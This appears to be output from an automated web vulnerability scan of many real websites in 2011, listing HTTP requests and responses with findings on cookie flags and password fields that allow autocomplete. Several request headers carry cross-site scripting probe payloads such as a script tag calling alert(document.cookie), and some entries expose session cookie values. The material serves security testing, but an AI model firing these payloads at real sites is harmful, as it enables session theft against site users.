HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:14:02 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=b87462d701086cc5258ca445f8422d6b; expires=Sat, 25-Jan-2031 03:14:02 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 03:15:02 GMT Vary: Accept-Encoding Content-Length: 100 Content-Type: application/json Connection: close
{"data":{"errors":{"RP1":"Please enter your email address or domain name."}},"statusCode":"failure"}
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Omniture AWS/2.0.0 Location: http://www.omniture.com/en/ Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Sat, 29 Jan 2011 23:23:55 GMT Connection: close Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.omniture.com ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.outblush.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 11007 Date: Sun, 30 Jan 2011 02:01:00 GMT Age: 0 Connection: close Server: IBSrv 1.0 Set-Cookie: BIGipServerbargainist_POOL=1509626028.52514.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard"> <head>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /track_new/track.php?tracking=Neudesic69f18 HTTP/1.1 Host: www.reimage.com Proxy-Connection: keep-alive Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=tr00qdoq010dhkbjc6ke2ogs54; _language=english
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.stylemepretty.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 02:03:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding Set-Cookie: wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:25 GMT; path=/ X-Pingback: http://www.stylemepretty.com/xmlrpc.php X-Mobilized-By: WordPress Mobile Pack 1.2.0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 30 Jan 2011 02:03:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40283
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--[if IE 7]><![endif]--> <!--[if lt IE 7]><![endif]--> <html xmlns="http:// ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1 Host: www.terra.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 02:03:33 GMT Server: Apache X-Powered-By: PHP/5.2.10 Status: 404 Not Found Location: http://buscador.terra.com/404.aspx?ca=z&query=$%7Cwww&source=Search&curl=http://www.terra.com/$%7Cwww.people.com/$%7Chttp:/www.walmart.com/%7Chttp:/www.walmart.com/cp/toys/4171%7Chttp:/www.walmart.com/cp/Electronics/3944 Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296353013.43280; path=/; expires=Fri, 01-Jan-2016 00:02:15 GMT; domain=.terra.com Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1 Host: www.terra.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 30 Jan 2011 02:03:40 GMT Server: Microsoft-IIS/6.0 cache-control: no-cache X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://buscador.terra.com.mx/404.aspx?ca=z&source=Search&query=default.htm%257Chttp%3a+www.terra.com+%24%257Cwww.people.com+%24%257Chttp%3a+www.walmart.com+%257Chttp%3a+www.walmart.com+cp+toys+4171%257Chttp%3a+www.walmart&curl=http%3a%2f%2fwww.terra.com.mx%2fdefault.htm%257Chttp%3a%2fwww.terra.com%2f%24%257Cwww.people.com%2f%24%257Chttp%3a%2fwww.walmart.com%2f%257Chttp%3a%2fwww.walmart.com%2fcp%2ftoys%2f4171%257Chttp%3a%2fwww.walmart.com%2fcp%2fElectronics%2f3944 Cache-Control: private Content-Type: text/html; charset=iso-8859-1 Content-Length: 592 Set-Cookie: CookiePortalMX=233854160.20480.0000; expires=Sun, 30-Jan-2011 04:03:40 GMT; path=/
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://buscador.terra.com.mx/404.aspx?ca=z&source=Search&query=default.htm%257Chttp%3a+www.terra.com+%24%257Cww ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /employment-trends/video-interviews/ HTTP/1.1 Host: www.theworkbuzz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2 Vary: Accept-Encoding,Cookie Cache-Control: max-age=300, must-revalidate Content-Type: text/html; charset=UTF-8 Date: Sat, 29 Jan 2011 23:55:31 GMT Expires: Sun, 30 Jan 2011 00:00:31 GMT Accept-Ranges: bytes Connection: close Set-Cookie: X-Mapping-caklakng=BFF43994C5529A7F9B0AC690658AAD29; path=/ Last-Modified: Sat, 29 Jan 2011 16:33:17 GMT Content-Length: 49242
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fun-stuff/your-work-soundtrack/ HTTP/1.1 Host: www.theworkbuzz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2 Vary: Accept-Encoding,Cookie Cache-Control: max-age=300, must-revalidate Content-Type: text/html; charset=UTF-8 Date: Sat, 29 Jan 2011 23:55:40 GMT Expires: Sun, 30 Jan 2011 00:00:40 GMT Accept-Ranges: bytes Connection: close Set-Cookie: X-Mapping-caklakng=46B1EFBB3B916447A34716FB66E1BFF9; path=/ Last-Modified: Sat, 29 Jan 2011 08:48:16 GMT Content-Length: 47386
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cgi-bin/icart.asp HTTP/1.1 Host: www.tigerdirect.com Proxy-Connection: keep-alive Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pop%5Fcheck=active; visited=tempyes; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; SRVR=WEBX10%2D07A; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SRCCODE=WEB1101; SSLB=0
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-SV: MIA01A X-Powered-By: ASP.NET Pragma: no-cache Cache-Control: private Content-Type: text/html Expires: Sat, 29 Jan 2011 15:14:42 GMT Cache-Control: no-cache Vary: Accept-Encoding Date: Sun, 30 Jan 2011 15:14:42 GMT Connection: close Set-Cookie: SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/ Set-Cookie: SRVR=WEBX12%2D06B; path=/ Content-Length: 1476
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /secure/captcha/Default.aspx HTTP/1.1 Host: www.tigerdirect.com Proxy-Connection: keep-alive Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pop%5Fcheck=active; visited=tempyes; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; SRVR=WEBX10%2D07A; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SRCCODE=WEB1101; SSLB=0
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-SV: MIA01A X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 384 Date: Sun, 30 Jan 2011 15:14:42 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ASP.NET_SessionId=kjgyls45inwxcw55ezidnd45; path=/; HttpOnly Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44&CaptchaTextVal=9895C6C99F6C; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/CKZzn00w01M HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/mm8byzo8zWE HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:51 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:51 GMT Content-Length: 15108
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The form contains the following password field with autocomplete enabled:
password
Request
GET /cp/landing/44762?trackingid=516068&bannerid=2117632 HTTP/1.1 Host: msn.chemistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://msn.chemistry.com/cp/landing/44762
The form contains the following password field with autocomplete enabled:
password
Request
GET /cp/landing/44762 HTTP/1.1 Host: msn.chemistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://msn.chemistry.com/cp/landing/57269
The form contains the following password field with autocomplete enabled:
password
Request
GET /cp/landing/57269 HTTP/1.1 Host: msn.chemistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
password
Request
GET /cp/landing/57269?trackingid=516068&bannerid=2117936>1=26000 HTTP/1.1 Host: msn.chemistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
password
Request
GET /cp/landing/57269?trackingid=516068&bannerid=2117936 HTTP/1.1 Host: msn.chemistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://spacefellowship.com/login?redirect=%2F
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: spacefellowship.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:19:03 GMT Server: Apache Set-Cookie: sfs_session=cc2c07278f598760f84f6726d5e79843; expires=Sat, 19-Jan-2013 02:19:03 GMT; path=/; domain=spacefellowship.com; httponly Connection: close Content-Type: text/html; charset: utf-8 Content-Length: 92137
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /HelenASPopkin HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:02:47 GMT Server: hi Status: 200 OK X-Transaction: 1296356567-38386-11000 ETag: "ea52c5afedc85cb07c6fff4a75310922" Last-Modified: Sun, 30 Jan 2011 03:02:47 GMT X-Runtime: 0.01712 Content-Type: text/html; charset=utf-8 Content-Length: 52277 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296356567344651; path=/; expires=Sun, 06-Feb-11 03:02:47 GMT; domain=.twitter.com Set-Cookie: guest_id=129635656738576607; path=/; expires=Tue, 01 Mar 2011 03:02:47 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWMwOWVkYzE1OTI2MDk0NDQ1ZGJiYjRjMmFiYmJlNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIW2nf1C0B--6f9e351ce1cfdf99abad41c8d129848e96fc4a8b; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /MichaelWann HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:02:27 GMT Server: hi Status: 200 OK X-Transaction: 1296356547-81727-2377 ETag: "8262f10ce7c81e5136cabe2a78847bad" Last-Modified: Sun, 30 Jan 2011 03:02:27 GMT X-Runtime: 0.01194 Content-Type: text/html; charset=utf-8 Content-Length: 52843 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296356547913422; path=/; expires=Sun, 06-Feb-11 03:02:27 GMT; domain=.twitter.com Set-Cookie: guest_id=129635654792136829; path=/; expires=Tue, 01 Mar 2011 03:02:27 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTNmZTg1NjI1MTBlYzM3OTk0YzQwOGRkYTcxODQyOTYzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIUh3f1C0B--ba2b2e85d86e8242c7c9defb78d02e28bd4f565e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /windabenedetti HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:02:57 GMT Server: hi Status: 200 OK X-Transaction: 1296356577-57560-43117 ETag: "37e7d4764aa4356aeb8c7f93b34df6b0" Last-Modified: Sun, 30 Jan 2011 03:02:57 GMT X-Runtime: 0.00997 Content-Type: text/html; charset=utf-8 Content-Length: 49069 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296356577758623; path=/; expires=Sun, 06-Feb-11 03:02:57 GMT; domain=.twitter.com Set-Cookie: guest_id=12963565777757520; path=/; expires=Tue, 01 Mar 2011 03:02:57 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZiZjBlYjQ4OTMwMGMzOTA3Nzg4OTQxNTc0YzEzN2JmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI8JHf1C0B--5fe442064eb48ecd736f8d0fc43646e6d9ffb6d4; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /wjrothman HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:02:43 GMT Server: hi Status: 200 OK X-Transaction: 1296356563-11223-39959 ETag: "067321df962e685b47091af05f4b9fbc" Last-Modified: Sun, 30 Jan 2011 03:02:43 GMT X-Runtime: 0.01619 Content-Type: text/html; charset=utf-8 Content-Length: 49641 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296356563232205; path=/; expires=Sun, 06-Feb-11 03:02:43 GMT; domain=.twitter.com Set-Cookie: guest_id=129635656362644604; path=/; expires=Tue, 01 Mar 2011 03:02:43 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTVjMmFiMWM4ZTg4ZjRhNmE2N2QyZTlhMzYyMDlkNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIrFrf1C0B--3aa7bb9fe9c6795ddbbf9680544888cbf7541ea2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /ToddKenreck HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:03:01 GMT Server: hi Status: 200 OK X-Transaction: 1296356581-64489-22662 ETag: "64fd45f3d163ffe5f3eb5309c6bbafbb" Last-Modified: Sun, 30 Jan 2011 03:03:01 GMT X-Runtime: 0.01332 Content-Type: text/html; charset=utf-8 Content-Length: 38284 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296356581648173; path=/; expires=Sun, 06-Feb-11 03:03:01 GMT; domain=.twitter.com Set-Cookie: guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCN%252Bh39QtAToHaWQiJTZkNWFlYzNiNjc5OTZk%250AN2JjM2EyOTg3YzdkNWU2Y2U5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--0004367452c498e4750ca5a1e95bbdef70cffad9; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The form contains the following password field with autocomplete enabled:
pass
Request
GET / HTTP/1.1 Host: www.dailygrail.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 03:05:32 GMT Server: lighttpd Content-Length: 63252
The page contains a form with the following action URL:
https://login.delish.com/registration/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips HTTP/1.1 Host: www.delish.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 109796 Content-Type: text/html; charset=utf-8 Cache-Control: max-age=337 Date: Sat, 29 Jan 2011 23:53:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... </div>-->
The page contains a form with the following action URL:
https://login.delish.com/registration/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001 HTTP/1.1 Host: www.delish.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 93291 Content-Type: text/html; charset=utf-8 Cache-Control: max-age=504 Date: Sat, 29 Jan 2011 23:53:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... </div>-->
The form contains the following password field with autocomplete enabled:
pass
Request
